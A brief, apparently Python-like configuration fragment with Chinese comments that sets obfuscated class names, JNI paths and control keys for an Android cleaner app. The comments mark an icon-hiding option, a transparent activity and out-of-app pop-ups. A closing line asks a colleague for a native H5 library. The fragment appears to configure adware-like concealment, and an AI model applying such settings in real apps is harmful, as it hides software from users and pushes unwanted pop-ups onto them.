// 这里面的信息都需要修改
sgle['com.smoke.clears.away.single', 'com.smooths.woclean',  # 包名
               'amb.show.Sledc',# 透明activity
               'an/bor/SgBbr',  #  广播
               '','com.smoke.clears.away.single.DcSingle',  # 隐藏图标 other1","main2
               'an/nee/dc', '"a0"',  # jni路径及函数
               '/sing',# 外弹文件开关名
               '"vser"',# 广播接收key
               '"cecas"',  # 恢复
               '"vffe"',  # 隐藏
               '"neesl"']  # 外弹

inclan['com.smoke.clears.away.single', 'com.smooths.woclean',  # 包名
                  'an/nee/dc',
                   '"bsle"','"csing"', '"dsgl"',
                  'an/need/Aher',  # hander
                  'an/need/Beic',  # wvcClass WebViewClient
                  'an/need/Cehl',  # WccClass WebChormeClient
                  '/sing']#文件开关
钟哥，给一下H5的So呢，包名：com.smooths.woclean